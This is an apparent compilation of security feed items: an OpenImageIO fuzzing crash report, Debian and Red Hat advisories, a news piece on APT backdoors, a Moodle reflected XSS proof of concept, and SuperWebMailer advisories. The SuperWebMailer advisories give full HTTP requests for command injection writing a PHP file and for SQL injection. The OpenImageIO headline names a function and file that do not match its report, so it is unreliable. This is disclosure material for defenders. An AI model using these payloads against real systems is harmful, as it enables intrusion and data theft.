An issue in OpenImageIO oiio v.2.4.12.0 allows a remote attacker to execute arbitrary code and cause a denial of service via the read_rle_image function of file bifs/unquantize.c

Describe the bug:  
Hi, I found runtime error: signed integer overflow in file src/bmp.imageio/bmpinput.cpp:302

To Reproduce:  
Steps to reproduce the behavior:

1.  CC=afl-clang-fast CXX=afl-clang-fast++ CFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" CXXFLAGS="-gdwarf-2 -g3 -O0 -fsanitize=address -fno-omit-frame-pointer" LDFLAGS="-fsanitize=address" cmake .. -DCMAKE\_CXX\_STANDARD=17
2.  make && make install
3.  iconvert --inplace poc.bmp  
    poc file:  
    poc.bmp.zip

Evidence:  
src/bmp.imageio/bmpinput.cpp:302:41: runtime error: signed integer overflow: 10240 \* 276095 cannot be represented in type 'int'  
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /root/fuzz/fuzz\_oiio/oiio/src/bmp.imageio/bmpinput.cpp:302:41 in  
terminate called after throwing an instance of 'std::length\_error'  
what(): vector::\_M\_default\_append  
0# OpenImageIO\_v2\_5\_2::Sysutil::stacktraceabi:cxx11 in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO\_Util.so.2.5.2  
1# 0x00007F5AA4E8B5CC in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO\_Util.so.2.5.2  
2# 0x00007F5AA4532520 in /lib/x86\_64-linux-gnu/libc.so.6  
3# pthread\_kill in /lib/x86\_64-linux-gnu/libc.so.6  
4# raise in /lib/x86\_64-linux-gnu/libc.so.6  
5# abort in /lib/x86\_64-linux-gnu/libc.so.6  
6# 0x00007F5AA48C1B9E in /lib/x86\_64-linux-gnu/libstdc++.so.6  
7# 0x00007F5AA48CD20C in /lib/x86\_64-linux-gnu/libstdc++.so.6  
8# 0x00007F5AA48CD277 in /lib/x86\_64-linux-gnu/libstdc++.so.6  
9# 0x00007F5AA48CD4D8 in /lib/x86\_64-linux-gnu/libstdc++.so.6  
10# std::\_\_throw\_length\_error(char const\*) in /lib/x86\_64-linux-gnu/libstdc++.so.6  
11# 0x00007F5AA64A29AC in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
12# 0x00007F5AA64A2281 in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
13# 0x00007F5AA733A3BB in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
14# 0x00007F5AA73355FE in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
15# 0x00007F5AA7332396 in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
16# OpenImageIO\_v2\_5\_2::ImageInput::create(OpenImageIO\_v2\_5\_2::basic\_string\_view<char, std::char\_traits >, bool, OpenImageIO\_v2\_5\_2::ImageSpec const\*, OpenImageIO\_v2\_5\_2::Filesystem::IOProxy\*, OpenImageIO\_v2\_5\_2::basic\_string\_view<char, std::char\_traits >) in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
17# OpenImageIO\_v2\_5\_2::ImageInput::open(std::\_\_cxx11::basic\_string<char, std::char\_traits, std::allocator > const&, OpenImageIO\_v2\_5\_2::ImageSpec const\*, OpenImageIO\_v2\_5\_2::Filesystem::IOProxy\*) in /root/fuzz/fuzz\_oiio/oiio/build/lib/libOpenImageIO.so.2.5.2  
18# 0x000055E91B20C502 in ../../../oiio/build/bin/iconvert  
19# 0x000055E91B2133A1 in ../../../oiio/build/bin/iconvert  
20# 0x00007F5AA4519D90 in /lib/x86\_64-linux-gnu/libc.so.6  
21# \_\_libc\_start\_main in /lib/x86\_64-linux-gnu/libc.so.6  
22# 0x000055E91B14BC55 in ../../../oiio/build/bin/iconvert  
Aborted

Platform information:  
OIIO branch/version: 2.4.14.0  
OS: Linux  
C++ compiler: clang-14.0.6

CVE-2023-42295: runtime error: signed integer overflow in file src/bmp.imageio/bmpinput.cpp:302 · Issue #3947 · AcademySoftwareFoundation/OpenImageIO

Debian Linux Security Advisory 5531-1 - It was discovered that roundcube, a skinnable AJAX based webmail solution for IMAP servers, did not properly sanitize HTML messages. This would allow an attacker to load arbitrary JavaScript code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5531-1                   security@debian.orghttps://www.debian.org/security/                       Sebastien DelafondOctober 23, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : roundcubeCVE ID         : CVE-2023-5631Debian Bug     : 1054079It was discovered that roundcube, a skinnable AJAX based webmailsolution for IMAP servers, did not properly sanitize HTMLmessages. This would allow an attacker to load arbitrary JavaScriptcode.For the oldstable distribution (bullseye), this problem has been fixedin version 1.4.15+dfsg.1-1~deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.6.4+dfsg-1~deb12u1.We recommend that you upgrade your roundcube packages.For the detailed security status of roundcube please refer toits security tracker page at:https://security-tracker.debian.org/tracker/roundcubeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCgAdFiEEAqSkbVtrXP4xJMh3EL6Jg/PVnWQFAmU2FhEACgkQEL6Jg/PVnWTgbQf/T08r3SQ/NFUpzs1/8k+euPOyysNFnW7JZ1LcI+ug5iF8RrdEVVuURZHK7i/SuRNomgEQbUyVpgSb9rb6z5qkc0k6gbfh2+KMRk0ViHhG1+tuEe1O99abXt+5LUQNtXWVMAniWWdbtdQeCBHWgxMpstarWq4akgCnx1Dj7Tj8PyX05+bYFpR79WMqCKypX4lz1kP8U3U5c0tPDi/zjuzGT1IvVSyWPesaNHzmD4ZMr9A/dcDBtxQ+kTaPN3GVPJoDG9TVOcHQTqcb2MmTQY5FtvQswVCXiEsugbmgOQ4wiUYlV90C8s4ALSxBBiv+mOUCKZH/mNNjNeHKADW+nOkOeg===TSzb-----END PGP SIGNATURE-----

Debian Security Advisory 5531-1

Debian Linux Security Advisory 5530-1 - Several vulnerabilities were discovered in ruby-rack, a modular Ruby webserver interface, which may result in denial of service and shell escape sequence injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5530-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 22, 2023                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-rackCVE ID         : CVE-2022-30122 CVE-2022-30123 CVE-2022-44570 CVE-2022-44571                 CVE-2022-44572 CVE-2023-27530 CVE-2023-27539Debian Bug     : 1029832 1032803 1033264Several vulnerabilities were discovered in ruby-rack, a modular Rubywebserver interface, which may result in denial of service and shellescape sequence injection.For the oldstable distribution (bullseye), these problems have been fixedin version 2.1.4-3+deb11u1.We recommend that you upgrade your ruby-rack packages.For the detailed security status of ruby-rack please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ruby-rackFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmU1FpxfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SAig/+MS3miFMErKy2l1DjwlzjchJC0cyfMHdVn1mpWZMd3iRVuKqqhRt/GlLSXYFRaU6loJ69WqZGLdnDJtKiOUkJPip5BIL2EZccYdg7nDkvvXs6ATffnC11B/SnJ0N7YAYubtyE/924H+mLh+rpx5sMkmGWHKGssQzP1e2erpBl3FRIQcWm/E1PkvZY3VmRbSluAxb3nQ6+bm+5RDNZOzPtkFQkEuGFV4BNFYqh0JWO2lKLkdG6r8+SaeBGKq5i+WtuHxYEVLB1Go6mvyymh8vDq6Mfimfas9B9SYDKjdiU3VOLoiaXEkjepdQFzSm1QVyk9aYJ6Qb5yy8hrr8XPfVuqlumF+ACpsAK1wH+WtKdiQkdZsvFpcYKn5g4q3zMa8RSoDAEnnc9AmGGdDOT/5sdosby1XAlrO7EoVGuhzKR7i1CtAdmnvABwf1dVqv3Jrn6pg+1c278vFc/n/fyXaHiPolRhr4xSxaNiT0OQ/f+ZUJg5NAT8WIS355kefSzAWVpOYB4kMM3OcWWwohkYWf6WuUoZZsIKvdE8dnAhV6NYaChrS6wA3fiLoQu0U9m+4jdB0IDLy+uffIzYCfeFepyq/Gg8e6TIx/T8Rf1uX8VFAvqiBXc3oIlGQMfaulmQel8mGBXceLIMU+Ze0kRmMf3j5JLWotnKRFNDHAW11U2OWU==tPF2-----END PGP SIGNATURE-----

Debian Security Advisory 5530-1

Moodle version 4.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: Moodle 4.3 Reflected XSS # Date: 21/10/2023# Exploit Author: tmrswrr# Vendor Homepage: https://moodle.org/# Software Demo: https://school.moodledemo.net/# Version: 4.3# Tested on: Linux Vulnerability Details======================Steps :1. Log in to the application with the given credentials > USER: teacher PASS: moodle2. Go to this page https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=3. Write this payload in the searchvalue field : "onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r34. When click this url "https://school.moodledemo.net/grade/report/grader/index.php?id=69&searchvalue=%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22qq9r3"5. You will be see alert button

Moodle 4.3 Cross Site Scripting

Red Hat Security Advisory 2023-5715-01 - An update for the nginx:1.20 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5715.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nginx:1.20 security updateAdvisory ID:        RHSA-2023:5715-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5715Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for the nginx:1.20 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5715-01

Red Hat Security Advisory 2023-5712-01 - An update for the nginx:1.20 module is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following data is constructed from data provided by Red Hat's json file at:https://access.redhat.com/security/data/csaf/v2/advisories/2023/rhsa-2023_5712.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: nginx:1.20 security updateAdvisory ID:        RHSA-2023:5712-01Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2023:5712Issue date:         2023-10-16Revision:           01CVE Names:          CVE-2023-44487====================================================================Summary: An update for the nginx:1.20 module is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:nginx is a web and proxy server supporting HTTP and other protocols, with a focus on high concurrency, performance, and low memory usage. Security Fix(es):* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-44487References:https://access.redhat.com/security/updates/classification/#moderatehttps://access.redhat.com/security/vulnerabilities/RHSB-2023-003

Red Hat Security Advisory 2023-5712-01

Buffer overflow vulnerability in the signelf library used by Zscaler Client Connector on Linux allows Code Injection. This issue affects Zscaler Client Connector for Linux: before 1.3.1.6.




CVE-2023-28793

The threat actor known as DoNot Team has been linked to the use of a novel .NET-based backdoor called Firebird targeting a handful of victims in Pakistan and Afghanistan.
Cybersecurity company Kaspersky, which disclosed the findings in its APT trends report Q3 2023, said the attack chains are also configured to deliver a downloader named CSVtyrei, so named for its resemblance to Vtyrei.
"Some

Cyber Espionage / Malware

The threat actor known as DoNot Team has been linked to the use of a novel .NET-based backdoor called **Firebird** targeting a handful of victims in Pakistan and Afghanistan.

Cybersecurity company Kaspersky, which disclosed the findings in its APT trends report Q3 2023, said the attack chains are also configured to deliver a downloader named CSVtyrei, so named for its resemblance to Vtyrei.

"Some code within the examples appeared non-functional, hinting at ongoing development efforts," the Russian firm said.

Vtyrei (aka BREEZESUGAR) refers to a first-stage payload and downloader strain previously harnessed by the adversary to deliver a malware framework known as **RTY**.

DoNot Team, also known by the names APT-C-35, Origami Elephant, and SECTOR02, is suspected to be of Indian origin, with its attacks employing spear-phishing emails and rogue Android apps to propagate malware.

The latest assessment from Kaspersky builds on an analysis of the threat actor's twin attack sequences in April 2023 to deploy the Agent K11 and RTY frameworks.

The disclosure also follows Zscaler ThreatLabz's uncovering of new malicious activity carried out by the Pakistan-based Transparent Tribe (aka APT36) actor targeting Indian government sectors using an updated malware arsenal that comprises a previously undocumented Windows trojan dubbed ElizaRAT.

"ElizaRAT is delivered as a .NET binary and establishes a C2 communication channel via Telegram, enabling threat actors to exert complete control over the targeted endpoint," security researcher Sudeep Singh noted last month.

Active since 2013, Transparent Tribe has utilized credential harvesting and malware distribution attacks, often distributing trojanized installers of Indian government applications like Kavach multi-factor authentication and weaponizing open-source command-and-control (C2) frameworks such as Mythic.

In a sign that the hacking crew has also set its eyes on Linux systems, Zscaler said it identified a small set of desktop entry files that pave the way for the execution of Python-based ELF binaries, including GLOBSHELL for file exfiltration and PYSHELLFOX for stealing session data from the Mozilla Firefox browser.

"Linux-based operating systems are widely used in the Indian government sector," Singh said, adding the targeting of the Linux environment is also likely motivated by India's decision to replace Microsoft Windows OS with Maya OS, a Debian Linux-based operating system, across government and defense sectors.

Joining DoNot Team and Transparent Tribe is another nation-state actor from the Asia-Pacific region with a focus on Pakistan.

Codenamed Mysterious Elephant (aka APT-K-47), the hacking group has been attributed to a spear-phishing campaign that drops a novel backdoor called ORPCBackdoor that's capable of executing files and commands on the victim's computer, and receive files or commands from a malicious server.

According to the Knownsec 404 Team, APT-K-47 shares tooling and targeting overlaps with that of other actors such as SideWinder, Patchwork, Confucius, and Bitter, most of which are assessed to be aligned with India.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DoNot Team's New Firebird Backdoor Hits Pakistan and Afghanistan

An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Remote Code Execution via a crafted sendmail command line.

**usd-2023-0015 | RCE in SuperWebMailer**

**Advisory ID**: usd-2023-0015  
**Product**: SuperWebMailer  
**Affected Version**: 9.00.0.01710  
**Vulnerability Type**: CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')  
**Security Risk**: CRITICAL  
**Vendor URL**: https://www.superwebmailer.de  
**Vendor acknowledged vulnerability**: No  
**Vendor Status**: Not fixed  
**CVE number**: CVE-2023-38193  
**CVE Link**: Pending

**Desciption**

SuperWebMailer is an online application for managing e-mail newsletters. An authenticated command injection vulnerability was discovered during an engagement. In a command injection attack, an attacker provides a malicious input which is passed by the application to the system and then executed.

The application allows to configure different methods to send outgoing e-mail. One of the available options is to configure sendmail. The user interface provides inputs for the path and the arguments to the sendmail binary. These inputs are accepted from the user without any encoding or filtering being applied. Consequently, an attacker may provide inputs that alter the intended effects of the sendmail command.

**Proof of Concept**

First, login with a user with the privileges to create or modify "Versandvarianten". A new "Versandvariante" can be created by navigating to "Einstellungen -> Versandvarianten -> Neue Versandvariante anlegen". The following screenshot shows a possible malicious payload that creates a php file in a user-readable location.  

The corresponding request is:

POST /mtaedit.php HTTP/2Host: swm.example.comCookie: PHPSESSID=8k8n7rmlnugo73d3jjtaeantft; SuperWebMailer=161kd4lr0kv8qplkknm927u0cs; smlswmCsrfToken=20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa; ckCsrfToken=owDltMAWfNyS6UeMRck4tE3kPhfh4qaTr6QkSLAQUser-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 556smlswmCsrfToken\=20mqIe2UqIA2ya6ImiqaYM2Q6EuYy6y6ya2QUa&MTAId\=3&Name\=sendmail+test&Type\=sendmail&MailLimit\=0&MTASenderEMailAddress\=&sendmail\_path\=%2Fusr%2Fsbin%2Fsendmail&sendmail\_args\=\-i%3B+echo+%27PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D%27+%7C+base64+-d+-+%7C+tee+%2Fvar%2Fwww%2Fhtml%2Fuserfiles%2F2%2Ftest-phpinfo.php%3B+cat&savetodir\_pathname\=&SleepInMailSendingLoop\=0&SMIMEMessageAsPlainText\=1&SMIMESignCert\=&SMIMESignPrivKey\=&SMIMESignPrivKeyPassword\=&SMIMESignExtraCerts\=&DKIMSelector\=&DKIMPrivKey\=&DKIMPrivKeyPassword\=&SubmitBtn\=%C3%84nderungen+speichern

The payload may be triggered by testing the newly created Versandvariante via the overview screen.  

The created file is accessible under the path specified in the payload.  

**Fix**

It is recommended that all input to an application is seen as potentially dangerous and thus filter input on the server-side.  
Where possible, an allowlist should be used for filtering.  
Additionally, it is recommended to utilize a programming language's APIs instead of directly issuing system or shell commands.  
Generally, all services should run with minimal required system privileges and users should have minimal required application privileges (least privilege).

**References**

https://cwe.mitre.org/data/definitions/77.html  
https://owasp.org/www-community/attacks/Command\_Injection

**Timeline**

*   **2022-09-26**: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.
*   **2023-04-20**: First contact request via info@superwebmailer.de.
*   **2023-05-08**: Reminder sent via info@superwebmailer.de and contact form.
*   **2023-05-15**: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.
*   **2023-05-25**: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com
*   **2023-06-05**: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).
*   **2023-07-17**: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.
*   **2023-08-17**: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.
*   **2023-10-02**: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.
*   **2023-10-20**: Vulnerabilities disclosed by usd AG.

**Credits**

This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.

CVE-2023-38193: usd-2023-0015 - usd HeroLab

An issue was discovered in SuperWebMailer 9.00.0.01710. It allows Export SQL Injection via the size parameter.

**usd-2023-0014 | SQL Injection in SuperWebMailer**

**Advisory ID**: usd-2023-0014  
**Product**: SuperWebMailer  
**Affected Version**: 9.00.0.01710  
**Vulnerability Type**: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')  
**Security Risk**: HIGH  
**Vendor URL**: https://www.superwebmailer.de  
**Vendor acknowledged vulnerability**: No  
**Vendor Status**: Not fixed  
**CVE number**: CVE-2023-38190  
**CVE Link**: Pending

**Desciption**

SuperWebMailer is an online application for managing e-mail newsletters.  
An authenticated SQL injection vulnerability was discovered during an engagement.  
In an SQL injection attack, a malicious input is used to alter the queries the application sends to an SQL server.

The application contains an export functionality that is vulnerable to an SQL injection attack.  
This functionality uses a **size** parameter provided by the user inside an SQL query without any encoding or filtering being applied.  
Consequently, an attacker may alter the SQL query in unintended ways.

**Proof of Concept**

The following request contains an SQL injection payload that displays the database version:

POST /exportrecipients.php HTTP/2Host: swm.example.comCookie: PHPSESSID=8ko13lk184llt0rqop2pikbf55; smlswmCsrfToken=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiEUser-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 393smlswmCsrfToken\=20YyMEiUeMAYAEA22yeme6EAYEeIM2UqiqIMiE&OneMailingListId\=1&MailingListName\=Test+Empf%C3%A4ngerliste&step\=4&Separator\=%2C&Header1Line\=1&AddQuotes\=1&ExportLines\=200&OnlyActiveRecipients\=&GroupsOption\=1&groups\=&fields%5Bu\_EMail%5D\=1&fields%5Bu\_FirstName%5D\=1&fields%5Bu\_LastName%5D\=1&start\=1,1+procedure+analyse(extractvalue(rand(),concat(0x3a,version())),1)%3b%23&ExportRowCount\=5

The database version is printed in the response as part of an error message:

HTTP/2 200 OKServer: openrestyDate: Sun, 25 Sep 2022 16:48:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 16149Expires: Mon, 26 Jul 1997 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, max-age=0Last-Modified: Sun, 25 Sep 2022 16:48:39 GMTPragma: no-cacheX-Frame-Options: SAMEORIGINCache-Control: post-check=0, pre-check=0Vary: Accept-EncodingX-Served-By: swm.example.com\[...\]                <td colspan\="2"\><b\>SQL-Fehler:</b\>&nbsp;XPATH syntax error: ':10.5.15-MariaDB-0+deb11u1' 1105<br /><br />                                <b\>SQL-Anweisung:</b\>&nbsp;SELECT DISTINCT u\_EMail, u\_FirstName, u\_LastName, \*\*testempfngerliste\_members\*\*.\*\*id\*\* FROM \*\*testempfngerliste\_members\*\*   ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);#, 200<br /><br /></td\>\[...\]</body\></html\>

**Fix**

SQL injection vulnerabilities can be prevented by using prepared statements with parameterized queries. Additionally, all input to the application should be treated as potentially dangerous and consequently validated on the server-side.

**References**

https://cwe.mitre.org/data/definitions/89.html  
https://owasp.org/www-community/attacks/SQL\_Injection

**Timeline**

*   **2022-09-26**: This vulnerability was discovered by Florian Dewald and Gerbert Roitburd of usd AG.
*   **2023-04-20**: First contact request via info@superwebmailer.de.
*   **2023-05-08**: Reminder sent via info@superwebmailer.de and contact form.
*   **2023-05-15**: Second reminder to webmaster@wt-rate.com and info@superwebmailer.de.
*   **2023-05-25**: Another reminder sent to info@superwebmailer.de, webmaster@wt-rate.com and info@wt-rate.com
*   **2023-06-05**: Once more tried to inform the company of the vulnerabilities via the feedback form (info@superwebmailer.de).
*   **2023-07-17**: Sent another email to info@supermailer.de, webmaster@wt-rate.com, info@wt-rate.com and info@superwebmailer.de, stressing that CVEs are assigned to the vulnerabilities and disclosure may happen in case we do not receive an answer soon.
*   **2023-08-17**: As the vulnerabilities were found during a pentest, the customer was asked whether or not the Responsible Disclosure Team should move forward without the software vendor's cooperation.
*   **2023-10-02**: Final notice given to info@superwebmailer, warning of immenent disclosure should there be no response within a week.
*   **2023-10-20**: Vulnerabilities disclosed by usd AG.

**Credits**

This security vulnerability was identified by Florian Dewald and Gerbert Roitburd of usd AG.

Tag

#linux